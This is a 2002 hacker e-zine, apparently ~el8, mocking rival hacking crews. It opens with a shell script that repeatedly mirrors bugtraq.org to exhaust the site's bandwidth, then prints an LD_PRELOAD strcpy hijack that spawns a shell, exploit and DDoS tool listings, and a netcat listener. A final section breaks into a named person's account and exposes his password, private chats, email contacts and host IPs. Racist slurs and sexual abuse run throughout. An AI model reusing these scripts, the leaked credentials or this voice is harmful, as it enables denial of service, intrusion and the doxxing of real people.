# Probe: $? below is the exit status of grep, the last stage of the pipeline
# (0 = "exceeded" found, 1 = not found, other = grep error). A failing lynx
# therefore also yields 1, because grep then sees no input.
$CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null
SITE_RESPONSE=$?
# Loop while the probe reports "not found" (status 1); any other status ends it.
while [ $SITE_RESPONSE -eq 1 ] ;
do
echo sod0m1zing GOBBLES w/ a retr4kt4bl3 b4t0n ...
# No -p: from the second pass on mkdir fails because the directory exists.
# Neither mkdir nor cd is checked, so if cd fails wget writes into whatever
# the current directory is.
mkdir $DUMP_PATH
cd $DUMP_PATH
# Recursive download of the whole site; this is the traffic-generating step.
$CMD_WGET -r http://www.bugtraq.org
# Re-probe after each full mirror pass.
$CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null
SITE_RESPONSE=$?
done
# Delete the downloaded copy; the script never reads the mirrored files.
rm -rf $DUMP_PATH
echo THE MONTH OF THE TURKEY HAS ENDED
.~e~----------------------------------------------------------~e~.
; *13* ~e~ 1nterv1ew with te4m OG -- uncle m4v1s ;
`----------------------------------------------------------------'
1nterv1ew with te4m OG
by uncle m4v1s
--------------
m4v1s: y*
ben-z: n1gg4 sh1t u kn0w wh4t-1m-sayn, sh1t sh1t... h0ld up lemme
hit th4 b0ng 1 m0re tym3 d4wg
m4v1s: 0k
[appr0xim8ly 15 minutez elapse]
[the s0und 0f c0ughing 1n the backgr0und]
m4v1s: u 0k br0?
ben-z: sh1t, juzt blazn s0me weed u kn0w wh4t-1m-sayn, my b0y
dap[gH] iz 0ver u kn0w wh4t-1m-sayn, l3mm3 get an0ther
huff be4 th1z fewl10 burnz all my kr0n1k
m4v1s: 0k
ben-z: ur n0t lyke the m4v1s that teach3z typ1ng r1ght?
m4v1s: n0 m0thafuq4 th@z y0ur ugly bl4q m0m... th1z 1nterv1ew
1znt ab0ut me anyh0w h0lm3z
m4v1s: u re4dy 2 beg1n d4wg?
ben-z: y4 u kn0w wh4t-1m-sayn 1t s33mz l1ke every tyme 1 get 0n 1rc
th1z h0 wr4pz her b1g f@ bl4ck l1pz ar0und my c0ck & w0nt
l3t g0 u kn0w wh4t-1m-sayn lol ;>
m4v1s: 0h, ok
ben-z: b3n 2 tha m0th3rfuckin Z BI0t[H
m4v1s: y4 w0rd n1gg4-4-re4l
ben-z: yiz0
m4v1s: 0k, br0 1 g0t a l0ng l1zt 0f pe0ple 1 n33d 2 retr13v3 sn1ffl0gz
fr0m & 1 a1nt g0t n0 sh3llskr1pt 4 1t y3t... s0 if u r try1ng 2
w4st3 my t1m3 1 th1nk 1m g0nn4 g0
ben-z: 0k s0rry m4v1s g0 ah34d
m4v1s: k s0... wh0 st4rt3d te4m 0g??
ben-z: s0 u kn0w 1tz like we uz3d 2 be gH, th4 gl0bal h3ll, th3n my
b01z m0st8d & m1ndphazr g0t r41d3d.. 1t wuz w31rd y0 cuz lyke
me & m0sth8d w0uld alw4yz B t4lkn 0n 1rc n sh1t,
u kn0w wh4t-1m-sayn, kuz 1 wuz 0nly 12 @ the t1me, 1 n3v3r h1t
n.e. 0f th@ puzzy u kn0w wh4t-1m-sayn, m0st8d, he wuz k1nda
l1ke my ment0r 0nl1ne 4 g1rlz.. sh333333333333t we uz3d 2
m4k3 j3nn1c1d3 kum lyke 5 tymez 4n h0ur 0n th4 c0nf....
he uz3d 2 t4lk l1ke he wuz z0rr0 & i wuz h1z truzty s1dek1q
R0Dr1g0, u kn0w wh4t-1m-sayn, but th@ wuz 4g3z 4g0
ben-z: anyh0w s0 we g0t th1z 1d34, kuz l1ke h4lf 0f us w3r3nt
3v3n 1n j41l aft3r the gH r41dz, u kn0w wh4t-1m-sayn, cuz lyke
we wuznt even 0ld enuff 2 get t1me in juv1e s0 we dec1ded 2
st4rt a sekur1ty kr3w & see 1f we k0uld h1t 1t up b1g...
&& m4ybe m4k3 s0me pes0z... we f1gur3d 1f we g0t enuf
kust0m3rz we k0uld buy hack.c0.za fr0m g0vernmentb01 4fter
1t g0t shut d0wn, & mayb3 3v3n h4v3 enuf $$$$$$ [gr33n] 2
g3t 4 p4tch 4 the AIDZqu1lt w1th m0st8d's n1ck & 4
skreensh0t 0f the wh1teh0use def4c3m3nt.
m4v1s: 1nterest1ng... s0 1 he4r u r quite the 4sm k0d3r n0w...
ben-z: ya br0... g0tta le4rn th@ sh1t, 1tz t1ght y0.... 3v3r s1nce
me & my b01 m0sth8d repl4c3d th3 sh3llk0d3 1n r0tshb.c, 1tz
b33n l1ke a gr1pp1ng f4sc1n4t10n 4 m3... u kn0w wh4t-1m-sayn,
g0tt4 get the k0d3 4 th4 BQ, y0 n1gg4z b k0ll3ktn s0me l00t,
ben-z B p0pn sum r00t, quick'n sl1de up & d0wn /var/l-0-g,
be sure 2 rem0ve th3 h0stname 0f any re4l 0g, burn'n s0me
k4$h, wgetting ad0re in2 tha /var/cache, s1tt1n 1ns1d3 sm0kn
sum cr4q fr0m my c0ke c4n, 0verfl0win y0ur staq gett1n
r00t by f00lin sgid m4n, y3h we b4ckd00rd b1tchx, s0 m0thrfuqr
WH4TZ n3xt??????/
m4v1s: heh... th4t wuz pr3tty t1ght br0
ben-z: y4 1 g0 4ll sp0nt4ne0uz w/my fre4ky-phr33-phl0... s0meth1n
th@ b4nsh33 taught me 4 wh1le baq 0n r00tab3ga...
1 k4nt b st0pd, u kn0w wh4t-1m-sayn, lyke a nucl34r p0wer
pl4nt, BEN 2 th4 m0therfuqn Z.
m4v1s: 0k d()g k4n u plz ch1ll...
ben-z: 0h sh1t itz B3n 2 tha M0THAFUCK1N ZZZZZZZZZZZZ
y3z h3r3 1 c0m3, h0pn 0n y0ur sw1tch, hustl1n u 0uta sp0rtzk4rz
w1th m0re f1n3ss3 th4n k3v1n p0uls3n
u n1gg4z be h8in on my 4g3 but th@z 0k kuz u kn0w 1 fuqd m4ryk4t3
& ashl3y 0ls0n
qu1ck 2 th3 dr0p, wh3n u see me j01n y0ur ch4nn3l 0n 1rc u kn0w 1m
pakn th4 9
try k0mp1l1ng msk4n & ch3ck1n 4 s0l4r1s b0x3z 1n k0r34 & n0w u kn0w
u just kr0ss3d th4 phuckn l1n3
1 w4lk in k0ur4ge0us fuq the p0lym0rph1k sh3llk0d3, 1 d0nt k4r3 1f
ur run'n sn0rt
1 g0t 5 b1tch3z h1tn me up 4 breazt 1mpl4ntz be4 1 even get th1nking
4b0ut th3 fukn ch1ld supp0rt
m4v1s: w8 up.. i
ben-z: BEN 2 THA M0THAFUCKINZ m0thrfuqr u kn0w-wh4t-1m-sayn..
m4v1s: n0 B1TCH U l1sten 2 me, m0re l1ke b3n-2-tha-m0thafukn-G lyke benji,
u fukn w4nn4be l1l-b0w-w0w m0thrfuqr
fuk u bitch 1ve h4d enuf 0f y0ur sh1t
t1m3 2 dump y0ur w4r3z and f1n4lz3 th1z ~el8 styleeeeeeeee ........
ben-z: wtf??????
m4v1s: ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 *****
m4v1s@~el8:/0wned/og# cat trivia.txt
Who wrote the first Linux kernel? : Linus Torvalds
What register points to the beginning of the stack in x86? : esp
Which direction does the stack grow in x86? : down
When a processor is said to be 8,16,32,64 bit etc, what bus is that number refering to? : data bus
How much memory is allocated for a char on a 32 bit processor? : 4 bytes
What does pgp stand for? : Pretty Good Protection
What is the highest bit key you can create with pgp? : 4096 bits
Who invented hexadecimal? : IBM
Hoe many bits in a byte? : 8
The x11 server runs on which port? : 6000
Is it morally and ethically right to eat animals? : NO*no*FUCK MEAT EATERS*nope*naw
what is the size of a tcp header in bytes? : 20
what is the size of a ip header in bytes? : 20
what type is NULL defined as? : void pointer
what is the site of a integer in bytes? : 4
What header file contains (struct sockaddr_in) : /usr/include/netinet/in.h
what is the most common localnet subnet ? : 192.168
list the 2 required layers of network transfers. : Link Layer, IP Protocol
what is the \"main\" initilization structure for WinAPI? : WinMain()
What does ARP stand for? : Address Resolution Protocol
What is the hax0r drink of choice? : pepsi
What will gH never do? : die
What does Spanning Tree Protocol Prevent? : Network Loops
Which Cisco IOS command displays the current software version? : show version
What baud rate do Cisco console ports operate at? : 9600
ATM (network protocol) stands for what? : Asynchronous Transfer Mode
Traceroute uses ICMP and what protocol? : udp
What is the Cisco Caralyst Operating System commonly known as? : CatOS
What does ACL stand for? : Access List
OC-3\'s use what technology for a medium? : fiber
DS-3\'s use what for a medium? : Copper
how big is my cock : as big as a broken crayola
how big is my dick? : 11 inches around
m4v1s@~el8:/0wned/og# lynx sysctl.html
Date: Tue Apr 30 20:57:52 CDT 2002
From: ben-z <ben@ohgee.org>
To: YOU!
Subject: Neat IP Options in FreeBSD-4.4+
Just thought I'd pass along a few neat freebsd tricks I learned today:
sysctl net.inet.udp.blackhole=1 - the boxen will not respond with an RST (strictly, for UDP the
reply being suppressed is an ICMP port-unreachable) when it receives a UDP packet on a closed port
sysctl net.inet.udp.blackhole=2 - the boxen does nothing when a UDP packet is received for
a closed port
or
sysctl net.inet.tcp.blackhole=1 or =2 - same as above, but for TCP
The following lines can also be added to /etc/rc.conf for extra security:
tcp_drop_synfin="YES" -- the boxen will drop tcp packets with both the SYN+FIN flags set
(prevents OS fingerprinting)
log_in_vain="YES" -- connections to ports that have no listening socket will be logged
tcp_restrict_rst="YES" -- the kernel will no longer respond with an RST for invalid tcp
packets
icmp_drop_redirect="YES" - the kernel will ignore ICMP_REDIRECT messages
Enjoy,
ben-z
ben@ohgee.org
"The information transmitted is intended only for the person or entity to which it is
addressed and may contain confidential and/or privileged material. Any review,
retransmission, dissemination or other use of, or taking of any action in reliance upon,
this information by persons or entities other than the intended recipient is prohibited.
If you received this in error, please contact the sender and delete the material from all
computers."
m4v1s@~el8:/0wned/og# cat strcpy.txt
bash-2.05# cat test.c
/*
 * Demo target for the strcpy() interposition shown in this transcript.
 * Copies argv[1] into a 100-byte stack buffer with strcpy(): there is no
 * argc check and no length bound, and <string.h> is not included.
 * The transcript runs ./test with no arguments, so what happens next is
 * decided entirely by whichever strcpy() the runtime linker resolves.
 */
int main(int argc, char *argv[]) {
char buf[100];
strcpy(buf,argv[1]); /* unbounded copy; argv[1] is NULL when no argument is given */
return 0;
}
bash-2.05# su - ben
su-2.05$ cat strcpy.c
/*
 * Stand-in for libc's strcpy() under the same name, built as strcpy.so and
 * injected through LD_PRELOAD in the transcript. It ignores dst and src,
 * runs /bin/sh through system(), and returns a null pointer instead of dst.
 * src is declared without const, hence the "conflicting types" warning gcc
 * prints in the transcript.
 *
 * The shell inherits the credentials of the process that loaded the library:
 * the `id` output in the transcript is still uid=1000(ben), so nothing here
 * crosses a privilege boundary. Runtime linkers such as glibc's ld.so
 * restrict or ignore LD_PRELOAD for set-user-ID/set-group-ID programs
 * (secure-execution mode). For monitoring, the relevant signals are
 * LD_PRELOAD set in a process environment and unexpected entries in
 * /etc/ld.so.preload.
 */
char *strcpy(char *dst,char *src) {
system("/bin/sh"); /* runs as the calling user; arguments are never touched */
return 0; /* null pointer, not dst as the real strcpy() would return */
}
su-2.05$ gcc -c -static strcpy.c
strcpy.c:1: warning: conflicting types for built-in function `strcpy'
su-2.05$ ld -shared -o strcpy.so strcpy.o
su-2.05$ LD_PRELOAD="/home/ben/strcpy.so" ; export LD_PRELOAD
su-2.05$ ./test
$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben), 0(wheel)
m4v1s@~el8:/0wned/og/members/jaynus/code/asm# cat print.s
# Minimal freestanding program: writes a fixed 14-byte string to fd 1 and exits.
# Uses int $0x80 with arguments in registers; the syscall numbers below are
# read as Linux i386 (4 = write, 1 = exit) -- confirm against the target OS.
.section .data
string_to_print:
.ascii "hahahah owned\n"          # 14 bytes, no NUL terminator (.ascii adds none)
.text
.global _start
_start:
movl $4, %eax                     # syscall number 4 (write)
movl $1, %ebx                     # fd 1 (stdout)
movl $string_to_print, %ecx       # buffer address
movl $14, %edx                    # byte count, matches the string length above
int $0x80
movl $1, %eax                     # syscall number 1 (exit)
xorl %ebx, %ebx                   # exit status 0
int $0x80
m4v1s@~el8:/0wned/og/members/jaynus/code# head -n 20 cfg-parse.c |less
/* Example high level config parsing */
#include <stdio.h>
#define SHIT 1
#define POO 2
#define FUCK 3
struct cfg
{
char *shit;
char *poo;
char *fuck;
};
int main(int argc, char *argv[])
{
FILE *fd;
struct cfg *in;
char buff[255], *cmd;
m4v1s@~el8:/0wned/og/files/music# ls
ben-z-illumination_beyond.mp3* index.php.save*
ben-z-story_to_tell.mp3* shekk-just_another_day-part2.mp3*
ben-z_feat_gamble-illusions_freestyle.mp3* shekk-luck_is_your_only_god.mp3*
ben-z_feat_gamble-reflections_freestyle.mp3* shekk-top_of_dee_world.mp3*
index.html* shekk-wakin_up_bluez.mp3*
index.php*
m4v1s@~el8:/0wned/og/files/music# cd ../../
m4v1s@~el8:/0wned/og# cat ANNOUNCEMENT-040202.txt
OHGEE:
After playing around with our new domains, teamog.org and ohgee.org, I thought of
a great idea of how to regulate vhosts and email addresses! The problem is this:
the domains arent hosted on my box and theres nothing i can do about that. i simply
cant give _everyone_ who idles in the channel a bnc and email address. However,
i can provide tons of email addresses and a few bncs. SOOOOOO, the way I'm thinking
would be most appropriate for dividing up who gets what, is to make this offer:
* The first _WORTHWHILE_ package/code/text you submit to be posted on the site, you
will recieve an @ohgee.org or an @teamog.org email forward or pop3 account. your choice.
* The second (see above) you submit, i will do everything i can to hook you up with
ONE bnc to connect to efnet. A few people may have to share an ident due to the background
process restrictions, but fuck man its still a r33t bounce =]
*** The only other way you can get a teamog.org/ohgee.org subdomain is if you have
a LEGIT root boxen that you control the reverse dns for, AND we must ensure that only
og members can access that IP. i.e. ipfw must be setup to restrict that IP from every
user but you.
if you guys absolutely hate this idea let me know, but jaynus and i are the
only ones who paid money for this shit, so eat a cock =]
sincerely,
ben to the motherfucking z, BITCH.
ben@teamog.org
m4v1s@~el8:/0wned/og#
m4v1s@~el8:/0wned/og/ioho/one# ls
alfred.pl* cockblaster.irc* fawx3.c* ioho1.jpg* og-brute101.tgz* strscan2b1.c*
angst.txt* collegehowto.txt* index.html* kevorkian.txt* quotes.txt* tyrone1.tgz*
bacotell.txt* dbsnatch1.tgz* ioho-5-2001.tgz* mrps-v01.c* rvscan-v4.tgz*
m4v1s@~el8:/0wned/og/ioho/one# head *.pl *.txt *.irc *.c|less
==> alfred.pl <==
#!/usr/bin/perl -w
#
# example ddos server for non-root shells using perl sockets..
# listening port disuises itself as an eggdrop irc bot.
#
# crafted by: heeb (heeb@phayze.com) [#og @ irc.ndrsnet.com]
#
# version 0.1 (2/19/2001):
# very slow.. needs a whole lot of work to make it worth using.
# includes ident request flood, http GET / flood, smtp HELO flood,
==> angst.txt <==
so here i am, 18 years old and lost. 18 years old and
prescribed to prozac. 18 years old and 2 times a dropout. is it
wrong of me to not want to go to college? is it wrong of me to think
maybe theres something more out there for me than 4 more years of
fucking school? i never pictured myself working a normal 9 to 5. i
mean i love computers technology in general, but i still dont want
to be sitting in a fucking cubicle coding my whole life. i
always wanted to be something more than that. i just want to be remembered
for something. i want to be more than just another rat in the race. but i dont know
if i have it in me to be something special. maybe im destined to be
==> bacotell.txt <==
[og] hacking "baco tell" for fun and profit. *wink* *wink*, *nudge* *nudge*
Step 1:
order something that normally comes with tomatoes and has the "red sauce"
in it (i.e. a pexican mizza). specifically ask for "no tomatoes".
make sure to keep your reciept.
Step 2:
since the magic red sauce that they use has tomatoes in it, you will get
tomatoes. eat almost all of your food, but save a piece of it that has a
==> collegehowto.txt <==
how to fail out of college
by the ph4rcyd3
you may be thinking to yourself, "sheeeet, how hard could it be to fail out of college?"
but believe me, its a lot harder than you think. step 1: have yourself a really laid back senior year.
i mean, get into college and everything first. make sure its really far away too. you dont wanna be
stuck in your shit town forever.
then, get high before classes, skip school, sleep all day. come on! its your god given right as a senior to fuck up.
go the to prom with a hot ass chick, get her all drunk and fuck the shit out of her afterwards. then at graduation, dont wear a god damn thing under your gown,
and when you get your diploma, give your entire class a fruit bowl.
==> kevorkian.txt <==
the kevorkian
by halcy0n
the kevorkian bong was introduced to me a few weeks ago by a
friend of mine named bob. bob, being a pretty big pothead, had all
sorts of k-neeto smoking devices in his room. one of which, was a little
contraption he called the kevorkian. after 2 good hits off this mofo
i was toeeeeeeeee up. so, you want one? well heres how you make em.
materials needed
==> quotes.txt <==
<DeaDLinE> all i was doing was nukeing
<Genuwine> I'm not a playa, i just crutch alot
<Genuwine> I'm an expert on computer physics and how they work and what happens when u do this or that.. I only started nukes yesterday.. I'm a novice..
<HrshySqrt> I can crash your harddirve
[BeloZer0(warez@okcnasz-21.ionet.net)] i actually run Win98 and Linux dipship
!DuCkTaPe!*! [forfeit(teet@hey.laserlips.your.mother.was.a.snowblower)] JOHNNY FIVE IS ALIVE@#%!
<c0sm0s1> i gotz a bad case of carpool tunnel syndrome!
<JsFknChst> isnt it fun to rap freestyle while taking a dump
<JsFknChst> i thought it was some semi leet hax cult. and figured since i was a new member. i would
show off my power
<ferk-o> fuck me gently with a chainsaw and call me mother threasa
==> cockblaster.irc <==
#
# [og] cockblaster.irc, makes up a whole lot of random insults.
# compiled by #og @ irc.ndrsnet.com for good wholesome family fun!
#
@cb=[^B!^Bcb^B!^B]
@one.0=[johnson]
@one.1=[cock]
@one.2=[dyke]
@one.3=[clitoris]
==> fawx3.c <==
/* [og] fawx3.c, sends every type of icmp/igmp type+code to <host>
* -- heeb (heeb@phayze.com), #og @ irc.ndrsnet.com
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
==> mrps-v01.c <==
/*
* [ Mass RPC Program Scanner v.01 ]
* <( IOHO - 2001 )>
*
* quick, simple rpc scanner. scans a class a/b/c, list, single ip for
* running rpc programs. upcoming versions will utilize multiple sockets
* for speed, specific rpc id searching, and small os fingerprinting.
* look for further versions.
*
* thanks: robosok for debugging help
==> strscan2b1.c <==
/* ( IOHO 2001 #og irc.ndrsnet.com ) */
/* strscan.c v2b1 by ka0z@ndrsnet for IOHO E-Zine http://chickenz.net/og */
/* Basically, I made this for myself and it was suggested that I put */
/* this in the e-zine so I did. Any ideas on how to implement the */
/* multiple line banner checking would be greatly appreciated. */
/* this has been optimized with ntohl and htonl and shit like that blah */
/* blah blah blah.....ok */
#include <stdio.h>
m4v1s@~el8:/0wned/og/0day# ls
0x3a0x29snmp.c bacotell.txt htwatch-1.1.tgz pr0nhoar.sh trinscan-v1.0b2.tgz
2600-cable_uncap.txt blades.txt idq5.c quotes.txt tyrone1.tgz
73501867.c bsdtelnetd.c kevorkian.txt rvscan-v4.8.tgz x2
7350854.c cockblaster.irc mnemninja/ rvscan-v4.tgz x2.tgz
7350bind9-39273.c collegehowto.txt mrps-v01.c shells-v1.tgz x2src.tar.gz
7350cfsd.tgz dbsnatch1.tgz muhaha.tgz shellsv1.tgz x3.tgz
7350squish.c delegate6x.c netkit-telnetd.c slogin-sexter.c x4.tar
7350telnet.c dtspcx.c og-brute101.tgz solftpd.c x5.tgz
7350wurm.c eggkill.irc og-snmp.c solsafe-0.1.tgz xaim.sh
alfred.pl fawx3.c ogfw1.tgz strscan2b1.c xgdb.pl
angst.txt fuckm.sh osshchans-1.3.tgz targets
asp5.c hhp-netd.tgz pass targets.dat
m4v1s@~el8:/0wned/og/0day#
***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 *****
END STRAT3G1k 0DAY DUMP
.~e~----------------------------------------------------------~e~.
; *14* lyfestylez of the owned and lamest with aempirei -- b_ ;
`----------------------------------------------------------------'
<b_> hello this is b_
<b_> as you all know i hate aempirei's g*tz
<b_> i will show you around his account on gravitino
<b_> aempirei you are a pussy and i'll kick your fucking ass
<b_> btw i fucked your fiance
$ ssh -l aempirei gravitino.net
aempirei@gravitino.net's password: BoW-is-leet
$ ls -a
./ IrcLog naim*
../ Mail/ naim.core
.BitchX/ SearsMCBill naim.log
.addressbook Stereotype.tar.gz newfile
.addressbook.lu The Society of Strings.doc ngram-talker.tar.gz
.bash_history ainow.doc pics/
.bitchxrc ainow.prn public_html/
.cshrc ambient_idm.mp3 q/
.cyp.fsave bscan.cpp r3sum3.doc
.faimrc byz-io.ps readme
.history data_me reals.doc
.indent.pro e.gz reals.prn
.irlrc elite resume.txt
.login end-fs.doc scanner.tar.gz
.lynx_cookies fofo shit.txt
.mailrc irftpdx.c stream_idm
.pine-debug1 iwt/ tars/
.pine-debug2 iwt.tar.gz uip-0.6.tar.gz
.pine-debug3 kengstrom.doc webcrawl/
.pinerc logo.gz webcrawl.tgz
.profile mail/ wuexploit/
.ssh/ mbox wux86_glob.c
.tcshrc misccode/ x2-devel/
AIMDump.c moreCA.tar.gz zip-ssh*
<b_> as you can fucking see we not only kicked your ass, we own your
+ dumb ass
$ head AIMDump.c
/* AMBIENT EMPIRE */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pcap.h>
#include <ctype.h>
<b_> we have all your 0day qualys warez
$ less -R IrcLog
[msg(aempirei)] well if you think you are then letz go to the doctor
[aempirei(aempirei@gravitino.net)] good idea
[aempirei(aempirei@gravitino.net)] thats what i want to do
[msg(aempirei)] okie
[aempirei(aempirei@gravitino.net)] its just i've had this burning sensation
[msg(aempirei)] me too
[aempirei(aempirei@gravitino.net)] we should get checked that is all
[msg(aempirei)] honey, i agree
<b_> we have all your private irc convos
$ ls iwt
3net fullscan* logo-large report-livescan.c
768scan.c home/ logo-med report-tracemap.c
768scan.conf icons/ makepic* report3d-tracemap.c
MD5 ifret.c mkips* scan-main.c
Makefile include/ myfont.c sysfuncs.c
README ipv4.c osident-main.c tcpscan.c
dnslookup* legend.php* osident.c tcpscan.conf
draw-topology.c lib/ osprints.conf tracemap.c
drawer.php* livescan.c packets.c
fasttrig.c livescan.conf php/
<b_> look, more qualys-warez
$ cat mbox
> From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
> From: research@camisade.com [mailto:research@camisade.com]
> To: '&'
> To: BUGTRAQ@SECURITYFOCUS.COM
> To: Olivier Devaux
> To: Ralph Logan
> To: aempirei@gravitino.net
> To: oliv@qualys.com
> To: radix@camisade.com
> To: rlogan@camisade.com; jw@mksecure.com
> To: team-radix@camisade.com
Delivered-To: ani-abettini@camisade.com
Delivered-To: ani-all@camisade.com
Delivered-To: ani-cabad@camisade.com
Delivered-To: ani-cts-radix@camisade.com
Delivered-To: ani-info@camisade.com
Delivered-To: ani-radix@camisade.com
Delivered-To: ani-research@camisade.com
Delivered-To: ani-rlogan@camisade.com
Delivered-To: ani-team-radix@camisade.com
Delivered-To: ani@hert.org
Delivered-To: eugene@localhost.securityarchitects.com
Delivered-To: kendra@blandest.org
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: mailing list pen-test@securityfocus.com
From: "Adam O'Donnell" <adam@IO.ece.drexel.edu>
From: "Ambient Empire" <aempirei@ucla.edu>
From: "Ben Weber" <Ben.Weber@greythorninc.com>
From: "Chad Pringle" <chad@emerson-brooks.com>
From: "Customer Support" <cs@eastbaytechjobs.com>
From: "DICE" <nobody@dice.com>
From: "David Litchfield" <nisr@nextgenss.com>
From: "David Rhodus" <sdrhodus@wildcatblue.com>
From: "Dee and Galen Engstrom" <rendee@trvnet.net>
From: "Edg Duveyoung" <edg@iqtest.com>
From: "Home2" <home2@visiondirect.com>
From: "InvestBio_Report@aol.com" <InvestBio_Report@aol.com>
From: "Jay Doscher" <jay@doscher.com>
From: "Kathleen Koepp" <koepp2775home@earthlink.net>
From: "Kendra Engstrom" <dayzee@fade-out.org>
From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
From: ani <ani@plan9.hert.org>
From: ani@hert.org
From: anonymous@segfault.net
From: awr <awr@gravitino.net>
From: awr <awr@plan9.hert.org>
From: awr@gravitino.net
From: bidconfirm@ebay.com
From: obecian <obecian@iga.packetninja.net>
From: pandora <pandora@gravitino.net>
From: private static void <javaman@west.philly.ghetto.org>
From: proletariat <prole@redgeek.net>
To: messiah
To: pen-test@securityfocus.com
To: peter@slagheap.net, barclay@mp3.com, mark@stateful.net,
To: proletariat <prole@redgeek.net>
To: radix@camisade.com
To: rika@smtp.well.com
To: rlogan@camisade.com, all@camisade.com
To: shok@dataforce.net
To: siphon@gravitino.net
To: swezlex@yahoo.com
To: team-radix@camisade.com
To: xbud@g0thead.com
To: <all@camisade.com>
To: <bugtraq@securityfocus.com>
To: <cecile.osta@novamedia.fr>
To: <chris@gravitino.net>
To: <gravitino@gravitino.net>
To: <hoglund@clitcktosecure.com>
To: <kendra@blandest.org>
To: <radix@camisade.com>
To: <sbracken@clicktosecure.com>
To: <siphon@gravitino.net>
<b_> i luv mail
$ cat .ssh/known_hosts
redondo.pic.ucla.edu,128.97.12.10
192.168.1.2
64.167.139.59
adsl-64-167-139-59.dsl.snfc21.pacbell.net
undef.net,66.126.234.62
$ head wux86_glob.c
/*## wux86_glob - x86/linux wuftpd <= 2.6.1 remote root exploit #*//*## written by bind <bind@insidiae.org> jan 2002 USA #*/
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE - DO NOT DISTRIBUTE *//* this is proof of concept software. in no event shall the author be *//* liable for any direct, indirect, incidental, special, exemplary or *//* consequential damages resulting from the use of misuse of this software. */
#include <stdio.h>
#include <string.h>
<b_> im going to kick bind's ass too
$ head wuexploit/fuckwu.c
/*
* fuckwu - wuftpd <= 2.6.1 remote root exploit
* written by bind & aempirei
* 12-6-2001
* private source code.
* do not distribute.
*/
#include <stdio.h>
#include <unistd.h>
<b_> msg me for source code
$ ls misccode/
aetrojan.c fmt.c haq.c inliner.c p.c tsl_bind.c
dnssniff.c fmtg.c identd.c nbtmap.c shit.c
$ head naim.log
*** Log opened 2002-01-02T10:38.<br>
Ambient Empire -> Catastr0phik | what up<br>
Catastr0phik -> Ambient Empire | <HTML><BODY BGCOLOR="#ffffff">purrrrrrrrrrrrrrrrr</BODY></HTML><br>
Catastr0phik -> Ambient Empire | <HTML><BODY BGCOLOR="#ffffff">how exciting!<BR></BODY></HTML><br>
Catastr0phik -> Ambient Empire | <HTML><BODY BGCOLOR="
$ cat .bash_history
ls -l
scr-bx -?
scr-bx -h
scr-bx -l
scr-bx ttyp2
scr-bx 34533
scr-bx -l
scr-bx 41799
mutt
exit
mutt
ls
ls
ls -l
cd /usr/
ls
cd src/
ls
cd ..
cd include/
ls
cd net
ls
vi if_ieee80211.h
mutt
exit
scr-b
scr-bx
exit
mutt
scr-bx
mutt
exit
mutt
scr-bx
mutt
exit
scr-bx
mutt
exitr
exit
scr-bx
mutt
exit
BitchX aempirei irc.dal.net
exit
ls
cd to
cd public_html/
ls
tar xvfz nc110.tgz
cd nc110
ls
vi Makefile
CAT *|GREP GAPING
cap *|GREP GAPING
cat *|GREP GAPING
cat *|grep GAPING
make -DGAPING_SECURITY_HOLE
make linux -DGAPING_SECURITY_HOLE
make linux -DGAPING_SECURITY_HOLE
make -?
make linux -D GAPING_SECURITY_HOLE
exit
cd public_html/
cd nc110q
cd nc110
ls
make linux -D GAPING_SECURITY_HOLE
ls -l
vi Makefile
exit
cd public_html/
ls
cd nc110
vi Makefile
ls
tar cvfz nc110.tgz nc110
rm -rf nc110
tar xvfz nc110.tgz
cd nc110
ls
vi Ms
bastard
vi Makefile
make linux
ls
./nc
./nc -l -p 1666 -e /sbin/shutdown
exit
xsw public_html
cd public_html/
ls
cd nc110
ls
cd
l
ls
vi code.c
vi die.c
man bind
vi die.c
man accept
vi die.c
ls
gcc die.c -o d
man netinet
man inet_ntoa
vi die.c
gcc die.c -o d -Wall
vi die.c
gcc die.c -o d -Wall
vi die.c
man accept
vi die.c
exit
mutt
scr-bx
cd .BitchX/
ls
cat BitchX.away
cat BitchX.away |grep -v Time
cat BitchX.away |grep -v Time|grep MSGS
scr-bx
exit
mutt
ping mail.fade-out.org
mutt
exit
mutt
scr-bx
BitchX dayzee mclean.va.us.undernet.org
eixt
exit
mutt
mutt
exit
mutt
telnet beta.eshop.msn.com
telnet beta.eshop.msn.com 80
ping beta.eshop.msn.com 80a
ping beta.eshop.msn.com
ping help.microsoft.com
mutt
mutt
telnet mail.the-mathclub.net 25
mutt
ls
exit
mutt
BitchX sempirei mclean.va.us.undernet.org
muyy
mutt
mutt
ls
BitchX aempirei
exit
telnet www.hackphreak.org 8080
telnet www.hackphreak.org 8081
telnet m4dsekc1.net 3140
telnet 24.21.53.20 31410
telnet 24.21.53.204 31410
telnet 24.21.53.204 31410
telnet 24.21.53.204 31410
telnet 24.21.53.204 31411
BitchX aempirei mclean.va.us.undernet.org
exit
mutt
EXIT
scr-bx
exit
mutt
telnet host-216-76-233-57.hsv.bellsouth.net 139
telnet host-216-76-233-57.hsv.bellsouth.net 135
telnet host-216-76-233-57.hsv.bellsouth.net 22
telnet 24.21.53.204 77
telnet 24.21.53.204 77
exit
BitchX aempirei us.undernet.og
BitchX aempirei us.undernet.org
BitchX aempirei us.undernet.org
mutt
scr-bx
exit
telnet whois.airn.net whois
telnet whois.arin.net whois
BitchX aempirei mclean.va.us.undernet.org
mutt
scr-b
scr-bz
BitchX aempirei mclean.va.us.undernet.org
mutt
exit
telnet www.hackphreak.org 8080
telnet www.hackphreak.org 8080
telnet www.hackphreak.org 9460
exit
mutt
scr-bx
BitchX aempirei mclean.va.us.undernet.org
mutt
scr-bx
BitchX rloxley www.hackphreak.org 9640
mutt
BitchX rloxley www.hackphreak.org 9460
BitchX rloxley www.hackphreak.org:9460
exit
BitchX aempirei mclean.va.us.undernet.org
scr-bx
